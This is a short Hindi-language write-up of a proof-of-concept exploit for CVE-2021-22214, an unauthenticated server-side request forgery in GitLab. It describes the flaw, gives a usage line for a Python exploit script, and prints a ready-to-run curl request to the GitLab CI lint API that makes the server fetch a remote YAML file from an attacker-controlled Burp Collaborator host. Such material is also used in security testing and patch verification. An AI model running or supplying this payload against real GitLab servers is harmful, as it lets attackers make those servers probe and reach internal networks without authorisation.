
CVE-2021-22214 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GitLab वेबहुक में सर्वर-साइड रिक्वेस्ट फोर्जरी है, जो बिना प्रमाणीकरण के हमलावरों को आंतरिक HTTP अनुरोध करने की अनुमति देता है।
CVE-2021-22214 के लिए POC: Gitlab SSRF
रिमोट GitLab इंस्टॉलेशन में वेबहुक के लिए आंतरिक नेटवर्क सक्षम होने के परिणामस्वरूप सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता शामिल है। एक रिमोट, अनप्रमाणित हमलावर पंजीकरण-सीमित GitLab इंस्टेंस का शोषण कर सकता है, जिससे यह हमलावर की पसंद के किसी भी डोमेन पर HTTP अनुरोध कर सकता है।
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'